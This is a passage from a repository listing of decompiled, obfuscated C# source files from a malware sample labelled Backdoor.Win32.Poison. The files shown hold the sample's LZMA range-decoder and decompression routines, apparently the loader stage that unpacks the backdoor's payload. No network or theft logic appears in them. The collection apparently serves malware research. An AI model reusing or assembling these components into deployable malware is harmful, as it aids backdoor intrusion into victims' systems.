public const uint \u0004\u0019 = 8;
public const int \u0005\u0002 = 4;
public const uint \u0005\u0004 = 16;
public const int \u0005\u0001 = 4;
public const uint \u0005\u0003 = 16;
public const int \u0004\u001B = 3;
public const int \u0004\u001D = 3;
public const int \u0004\u0015 = 8;
public const uint \u0004\u001C = 8;
public const uint \u0004\u001E = 8;
public const uint \u0004\u0016 = 272;
public const uint \u0004\u0011 = 273;
public static uint \u0004\u000C(uint len)
{
len -= 2U;
return len < 4U ? len : 3U;
}
public struct \u0005\u0012
{
public uint \u000B;
public void \u0001\u001B() => this.\u000B = 0U;
public void \u0005\u000A()
{
if (this.\u000B < 4U)
this.\u000B = 0U;
else if (this.\u000B < 10U)
this.\u000B -= 3U;
else
this.\u000B -= 6U;
}
public void \u0005\u000B() => this.\u000B = this.\u000B < 7U ? 7U : 10U;
public void \u0005\u000C() => this.\u000B = this.\u000B < 7U ? 8U : 11U;
public void \u0005\u000D() => this.\u000B = this.\u000B < 7U ? 9U : 11U;
public bool \u0005\u0008() => this.\u000B < 7U;
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0004/_0006_0005.cs
+341
View File
@@ -0,0 +1,341 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using \u0001\u0002;
using \u0001\u0003;
using \u0001\u0004;
using \u0001\u0005;
using System;
using System.IO;
namespace \u0001\u0004
{
public class \u0006\u0005 : \u0002\u0004, \u0002\u0007
{
private \u0004\u0002 m_\u0004\u0003 = new \u0004\u0002();
private \u0006\u0005 \u0006\u0002 = new \u0006\u0005();
private \u0007\u0001[] \u0005\u0016 = new \u0007\u0001[new IntPtr(192)];
private \u0007\u0001[] \u0005\u0018 = new \u0007\u0001[new IntPtr(12)];
private \u0007\u0001[] \u0005\u0019 = new \u0007\u0001[new IntPtr(12)];
private \u0007\u0001[] \u0005\u001A = new \u0007\u0001[new IntPtr(12)];
private \u0007\u0001[] \u0005\u001B = new \u0007\u0001[new IntPtr(12)];
private \u0007\u0001[] \u0005\u0017 = new \u0007\u0001[new IntPtr(192)];
private \u0007\u0007[] \u0006 = new \u0007\u0007[new IntPtr(4)];
private \u0007\u0001[] \u0005\u001F = new \u0007\u0001[new IntPtr(114)];
private \u0007\u0007 \u0005\u001E = new \u0007\u0007(4);
private \u0006\u0005.\u0006\u0004 \u0005\u001C = new \u0006\u0005.\u0006\u0004();
private \u0006\u0005.\u0006\u0004 \u0006\u0003 = new \u0006\u0005.\u0006\u0004();
private \u0006\u0005.\u0006\u000C \u0005\u001D = new \u0006\u0005.\u0006\u000C();
private uint \u0005\u0014;
private uint \u0005\u0015;
private uint \u0006\u0001;
public \u0006\u0005()
{
this.\u0005\u0014 = uint.MaxValue;
for (int index = 0; index < 4; ++index)
this.\u0006[index] = new \u0007\u0007(6);
}
private void \u0005\u0010(uint dictionarySize)
{
if ((int) this.\u0005\u0014 == (int) dictionarySize)
return;
this.\u0005\u0014 = dictionarySize;
this.\u0005\u0015 = Math.Max(this.\u0005\u0014, 1U);
this.m_\u0004\u0003.\u0002\u0010(Math.Max(this.\u0005\u0015, 4096U));
}
private void \u0005\u0011(int lp, int lc)
{
if (lp > 8)
throw new \u0002\u0005();
if (lc > 8)
throw new \u0002\u0005();
this.\u0005\u001D.\u0002\u0010(lp, lc);
}
private void \u0005\u0013(int pb)
{
if (pb > 4)
throw new \u0002\u0005();
uint numPosStates = (uint) (1 << pb);
this.\u0005\u001C.\u0002\u0010(numPosStates);
this.\u0006\u0003.\u0002\u0010(numPosStates);
this.\u0006\u0001 = numPosStates - 1U;
}
private void \u0001\u001B(Stream inStream, Stream outStream)
{
this.\u0006\u0002.\u0001\u001B(inStream);
this.m_\u0004\u0003.\u0001\u001B(outStream);
for (uint index1 = 0; index1 < 12U; ++index1)
{
for (uint index2 = 0; index2 <= this.\u0006\u0001; ++index2)
{
uint index3 = (index1 << 4) + index2;
this.\u0005\u0016[(IntPtr) index3].\u0001\u001B();
this.\u0005\u0017[(IntPtr) index3].\u0001\u001B();
}
this.\u0005\u0018[(IntPtr) index1].\u0001\u001B();
this.\u0005\u0019[(IntPtr) index1].\u0001\u001B();
this.\u0005\u001A[(IntPtr) index1].\u0001\u001B();
this.\u0005\u001B[(IntPtr) index1].\u0001\u001B();
}
this.\u0005\u001D.\u0001\u001B();
for (uint index = 0; index < 4U; ++index)
this.\u0006[(IntPtr) index].\u0001\u001B();
for (uint index = 0; index < 114U; ++index)
this.\u0005\u001F[(IntPtr) index].\u0001\u001B();
this.\u0005\u001C.\u0001\u001B();
this.\u0006\u0003.\u0001\u001B();
this.\u0005\u001E.\u0001\u001B();
}
public void \u0007\u000D(
Stream inStream,
Stream outStream,
long inSize,
long outSize,
\u0002\u0002 progress)
{
this.\u0001\u001B(inStream, outStream);
\u0004\u000A.\u0005\u0012 obj = new \u0004\u000A.\u0005\u0012();
obj.\u0001\u001B();
uint distance = 0;
uint num1 = 0;
uint num2 = 0;
uint num3 = 0;
ulong pos = 0;
ulong num4 = (ulong) outSize;
if (pos < num4)
{
if (this.\u0005\u0016[(IntPtr) (obj.\u000B << 4)].\u0007\u000C(this.\u0006\u0002) != 0U)
throw new \u0002\u0001();
obj.\u0005\u000A();
this.m_\u0004\u0003.\u0004\u0007(this.\u0005\u001D.\u0006\u000D(this.\u0006\u0002, 0U, (byte) 0));
++pos;
}
while (pos < num4)
{
uint posState = (uint) pos & this.\u0006\u0001;
if (this.\u0005\u0016[(IntPtr) ((obj.\u000B << 4) + posState)].\u0007\u000C(this.\u0006\u0002) == 0U)
{
byte prevByte = this.m_\u0004\u0003.\u0004\u0006(0U);
this.m_\u0004\u0003.\u0004\u0007(obj.\u0005\u0008() ? this.\u0005\u001D.\u0006\u000D(this.\u0006\u0002, (uint) pos, prevByte) : this.\u0005\u001D.\u0006\u000E(this.\u0006\u0002, (uint) pos, prevByte, this.m_\u0004\u0003.\u0004\u0006(distance)));
obj.\u0005\u000A();
++pos;
}
else
{
uint len;
if (this.\u0005\u0018[(IntPtr) obj.\u000B].\u0007\u000C(this.\u0006\u0002) == 1U)
{
if (this.\u0005\u0019[(IntPtr) obj.\u000B].\u0007\u000C(this.\u0006\u0002) == 0U)
{
if (this.\u0005\u0017[(IntPtr) ((obj.\u000B << 4) + posState)].\u0007\u000C(this.\u0006\u0002) == 0U)
{
obj.\u0005\u000D();
this.m_\u0004\u0003.\u0004\u0007(this.m_\u0004\u0003.\u0004\u0006(distance));
++pos;
continue;
}
}
else
{
uint num5;
if (this.\u0005\u001A[(IntPtr) obj.\u000B].\u0007\u000C(this.\u0006\u0002) == 0U)
{
num5 = num1;
}
else
{
if (this.\u0005\u001B[(IntPtr) obj.\u000B].\u0007\u000C(this.\u0006\u0002) == 0U)
{
num5 = num2;
}
else
{
num5 = num3;
num3 = num2;
}
num2 = num1;
}
num1 = distance;
distance = num5;
}
len = this.\u0006\u0003.\u0007\u000C(this.\u0006\u0002, posState) + 2U;
obj.\u0005\u000C();
}
else
{
num3 = num2;
num2 = num1;
num1 = distance;
len = 2U + this.\u0005\u001C.\u0007\u000C(this.\u0006\u0002, posState);
obj.\u0005\u000B();
uint num6 = this.\u0006[(IntPtr) \u0004\u000A.\u0004\u000C(len)].\u0007\u000C(this.\u0006\u0002);
if (num6 >= 4U)
{
int num7 = (int) (num6 >> 1) - 1;
uint num8 = (uint) ((2 | (int) num6 & 1) << num7);
distance = num6 >= 14U ? num8 + (this.\u0006\u0002.\u0006\u001B(num7 - 4) << 4) + this.\u0005\u001E.\u0007\u000A(this.\u0006\u0002) : num8 + \u0007\u0007.\u0007\u000A(this.\u0005\u001F, (uint) ((int) num8 - (int) num6 - 1), this.\u0006\u0002, num7);
}
else
distance = num6;
}
if ((ulong) distance >= pos || distance >= this.\u0005\u0015)
{
if (distance != uint.MaxValue)
throw new \u0002\u0001();
break;
}
this.m_\u0004\u0003.\u0004\u0004(distance, len);
pos += (ulong) len;
}
}
this.m_\u0004\u0003.\u0004\u0005();
this.m_\u0004\u0003.\u0002\u0017();
this.\u0006\u0002.\u0002\u0017();
}
public void \u0002\u000C(byte[] properties)
{
if (properties.Length < 5)
throw new \u0002\u0005();
int lc = (int) properties[0] % 9;
int num = (int) properties[0] / 9;
int lp = num % 5;
int pb = num / 5;
if (pb > 4)
throw new \u0002\u0005();
uint dictionarySize = 0;
for (int index = 0; index < 4; ++index)
dictionarySize += (uint) properties[1 + index] << index * 8;
this.\u0005\u0010(dictionarySize);
this.\u0005\u0011(lp, lc);
this.\u0005\u0013(pb);
}
private class \u0006\u0004
{
private \u0007\u0001 \u0006\u0007 = new \u0007\u0001();
private \u0007\u0001 \u0006\u0006 = new \u0007\u0001();
private \u0007\u0007[] \u0006\u0009 = new \u0007\u0007[new IntPtr(16)];
private \u0007\u0007[] \u0006\u000A = new \u0007\u0007[new IntPtr(16)];
private \u0007\u0007 \u0006\u0008 = new \u0007\u0007(8);
private uint \u0006\u000B;
public void \u0002\u0010(uint numPosStates)
{
for (uint index = this.\u0006\u000B; index < numPosStates; ++index)
{
this.\u0006\u0009[(IntPtr) index] = new \u0007\u0007(3);
this.\u0006\u000A[(IntPtr) index] = new \u0007\u0007(3);
}
this.\u0006\u000B = numPosStates;
}
public void \u0001\u001B()
{
this.\u0006\u0007.\u0001\u001B();
for (uint index = 0; index < this.\u0006\u000B; ++index)
{
this.\u0006\u0009[(IntPtr) index].\u0001\u001B();
this.\u0006\u000A[(IntPtr) index].\u0001\u001B();
}
this.\u0006\u0006.\u0001\u001B();
this.\u0006\u0008.\u0001\u001B();
}
public uint \u0007\u000C(\u0006\u0005 rangeDecoder, uint posState)
{
if (this.\u0006\u0007.\u0007\u000C(rangeDecoder) == 0U)
return this.\u0006\u0009[(IntPtr) posState].\u0007\u000C(rangeDecoder);
uint num = 8;
return this.\u0006\u0006.\u0007\u000C(rangeDecoder) != 0U ? num + 8U + this.\u0006\u0008.\u0007\u000C(rangeDecoder) : num + this.\u0006\u000A[(IntPtr) posState].\u0007\u000C(rangeDecoder);
}
}
private class \u0006\u000C
{
private \u0006\u0005.\u0006\u000C.\u0006\u0014[] \u0006\u0010;
private int \u0006\u0012;
private int \u0006\u0011;
private uint \u0006\u0013;
public void \u0002\u0010(int numPosBits, int numPrevBits)
{
if (this.\u0006\u0010 != null && this.\u0006\u0012 == numPrevBits && this.\u0006\u0011 == numPosBits)
return;
this.\u0006\u0011 = numPosBits;
this.\u0006\u0013 = (uint) ((1 << numPosBits) - 1);
this.\u0006\u0012 = numPrevBits;
uint length = (uint) (1 << this.\u0006\u0012 + this.\u0006\u0011);
this.\u0006\u0010 = new \u0006\u0005.\u0006\u000C.\u0006\u0014[(IntPtr) length];
for (uint index = 0; index < length; ++index)
this.\u0006\u0010[(IntPtr) index].\u0002\u0010();
}
public void \u0001\u001B()
{
uint num = (uint) (1 << this.\u0006\u0012 + this.\u0006\u0011);
for (uint index = 0; index < num; ++index)
this.\u0006\u0010[(IntPtr) index].\u0001\u001B();
}
private uint \u0006\u000F(uint pos, byte prevByte) => (uint) ((((int) pos & (int) this.\u0006\u0013) << this.\u0006\u0012) + ((int) prevByte >> 8 - this.\u0006\u0012));
public byte \u0006\u000D(\u0006\u0005 rangeDecoder, uint pos, byte prevByte) => this.\u0006\u0010[(IntPtr) this.\u0006\u000F(pos, prevByte)].\u0006\u000D(rangeDecoder);
public byte \u0006\u000E(\u0006\u0005 rangeDecoder, uint pos, byte prevByte, byte matchByte) => this.\u0006\u0010[(IntPtr) this.\u0006\u000F(pos, prevByte)].\u0006\u000E(rangeDecoder, matchByte);
private struct \u0006\u0014
{
private \u0007\u0001[] \u0006\u0015;
public void \u0002\u0010() => this.\u0006\u0015 = new \u0007\u0001[768];
public void \u0001\u001B()
{
for (int index = 0; index < 768; ++index)
this.\u0006\u0015[index].\u0001\u001B();
}
public byte \u0006\u000D(\u0006\u0005 rangeDecoder)
{
uint index = 1;
do
{
index = index << 1 | this.\u0006\u0015[(IntPtr) index].\u0007\u000C(rangeDecoder);
}
while (index < 256U);
return (byte) index;
}
public byte \u0006\u000E(\u0006\u0005 rangeDecoder, byte matchByte)
{
uint index = 1;
do
{
uint num1 = (uint) ((int) matchByte >> 7 & 1);
matchByte <<= 1;
uint num2 = this.\u0006\u0015[(IntPtr) ((uint) (1 + (int) num1 << 8) + index)].\u0007\u000C(rangeDecoder);
index = index << 1 | num2;
if ((int) num1 != (int) num2)
{
while (index < 256U)
index = index << 1 | this.\u0006\u0015[(IntPtr) index].\u0007\u000C(rangeDecoder);
break;
}
}
while (index < 256U);
return (byte) index;
}
}
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0005/_0006_0005.cs
+95
View File
@@ -0,0 +1,95 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using System.IO;
namespace \u0001\u0005
{
internal class \u0006\u0005
{
public const uint \u0006\u001E = 16777216;
public uint \u000F;
public uint \u0007\u000D;
public Stream Stream;
public void \u0001\u001B(Stream stream)
{
this.Stream = stream;
this.\u0007\u000D = 0U;
this.\u000F = uint.MaxValue;
for (int index = 0; index < 5; ++index)
this.\u0007\u000D = this.\u0007\u000D << 8 | (uint) (byte) this.Stream.ReadByte();
}
public void \u0002\u0017() => this.Stream = (Stream) null;
public void \u0006\u0019() => this.Stream.Close();
public void \u0003\u0010()
{
for (; this.\u000F < 16777216U; this.\u000F <<= 8)
this.\u0007\u000D = this.\u0007\u000D << 8 | (uint) (byte) this.Stream.ReadByte();
}
public void \u0006\u001D()
{
if (this.\u000F >= 16777216U)
return;
this.\u0007\u000D = this.\u0007\u000D << 8 | (uint) (byte) this.Stream.ReadByte();
this.\u000F <<= 8;
}
public uint \u0006\u001C(uint total) => this.\u0007\u000D / (this.\u000F /= total);
public void \u0007\u000C(uint start, uint size, uint total)
{
this.\u0007\u000D -= start * this.\u000F;
this.\u000F *= size;
this.\u0003\u0010();
}
public uint \u0006\u001B(int numTotalBits)
{
uint num1 = this.\u000F;
uint num2 = this.\u0007\u000D;
uint num3 = 0;
for (int index = numTotalBits; index > 0; --index)
{
num1 >>= 1;
uint num4 = num2 - num1 >> 31;
num2 -= num1 & num4 - 1U;
num3 = (uint) ((int) num3 << 1 | 1 - (int) num4);
if (num1 < 16777216U)
{
num2 = num2 << 8 | (uint) (byte) this.Stream.ReadByte();
num1 <<= 8;
}
}
this.\u000F = num1;
this.\u0007\u000D = num2;
return num3;
}
public uint \u0006\u001A(uint size0, int numTotalBits)
{
uint num1 = (this.\u000F >> numTotalBits) * size0;
uint num2;
if (this.\u0007\u000D < num1)
{
num2 = 0U;
this.\u000F = num1;
}
else
{
num2 = 1U;
this.\u0007\u000D -= num1;
this.\u000F -= num1;
}
this.\u0003\u0010();
return num2;
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0005/_0007_0001.cs
+53
View File
@@ -0,0 +1,53 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using \u0001\u0005;
namespace \u0001\u0005
{
internal struct \u0007\u0001
{
public const int \u0007\u0002 = 11;
public const uint \u0007\u0003 = 2048;
private const int \u0007\u0004 = 5;
private uint \u0007\u0005;
public void \u0007\u0006(int numMoveBits, uint symbol)
{
if (symbol == 0U)
this.\u0007\u0005 += 2048U - this.\u0007\u0005 >> numMoveBits;
else
this.\u0007\u0005 -= this.\u0007\u0005 >> numMoveBits;
}
public void \u0001\u001B() => this.\u0007\u0005 = 1024U;
public uint \u0007\u000C(\u0006\u0005 rangeDecoder)
{
uint num = (rangeDecoder.\u000F >> 11) * this.\u0007\u0005;
if (rangeDecoder.\u0007\u000D < num)
{
rangeDecoder.\u000F = num;
this.\u0007\u0005 += 2048U - this.\u0007\u0005 >> 5;
if (rangeDecoder.\u000F < 16777216U)
{
rangeDecoder.\u0007\u000D = rangeDecoder.\u0007\u000D << 8 | (uint) (byte) rangeDecoder.Stream.ReadByte();
rangeDecoder.\u000F <<= 8;
}
return 0;
}
rangeDecoder.\u000F -= num;
rangeDecoder.\u0007\u000D -= num;
this.\u0007\u0005 -= this.\u0007\u0005 >> 5;
if (rangeDecoder.\u000F < 16777216U)
{
rangeDecoder.\u0007\u000D = rangeDecoder.\u0007\u000D << 8 | (uint) (byte) rangeDecoder.Stream.ReadByte();
rangeDecoder.\u000F <<= 8;
}
return 1;
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0005/_0007_0007.cs
+67
View File
@@ -0,0 +1,67 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
using \u0001\u0005;
using System;
namespace \u0001\u0005
{
internal struct \u0007\u0007
{
private \u0007\u0001[] \u000E;
private int \u0007\u0009;
public \u0007\u0007(int numBitLevels)
{
this.\u0007\u0009 = numBitLevels;
this.\u000E = new \u0007\u0001[1 << numBitLevels];
}
public void \u0001\u001B()
{
for (uint index = 1; (long) index < (long) (1 << this.\u0007\u0009); ++index)
this.\u000E[(IntPtr) index].\u0001\u001B();
}
public uint \u0007\u000C(\u0006\u0005 rangeDecoder)
{
uint index1 = 1;
for (int index2 = this.\u0007\u0009; index2 > 0; --index2)
index1 = (index1 << 1) + this.\u000E[(IntPtr) index1].\u0007\u000C(rangeDecoder);
return index1 - (uint) (1 << this.\u0007\u0009);
}
public uint \u0007\u000A(\u0006\u0005 rangeDecoder)
{
uint index1 = 1;
uint num1 = 0;
for (int index2 = 0; index2 < this.\u0007\u0009; ++index2)
{
uint num2 = this.\u000E[(IntPtr) index1].\u0007\u000C(rangeDecoder);
index1 = (index1 << 1) + num2;
num1 |= num2 << index2;
}
return num1;
}
public static uint \u0007\u000A(
\u0007\u0001[] _param0,
uint startIndex,
\u0006\u0005 rangeDecoder,
int _param3)
{
uint num1 = 1;
uint num2 = 0;
for (int index = 0; index < _param3; ++index)
{
uint num3 = _param0[(IntPtr) (startIndex + num1)].\u0007\u000C(rangeDecoder);
num1 = (num1 << 1) + num3;
num2 |= num3 << index;
}
return num2;
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500/_0001_0006.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: !, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0FE674E5-1D2B-4709-A920-1E9AF1978A98
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.huvw-629a8704767e5bffb35022e9cfd91032277f1b6838a887590e0c114d3260f500.exe
internal class \u0001\u0006
{
}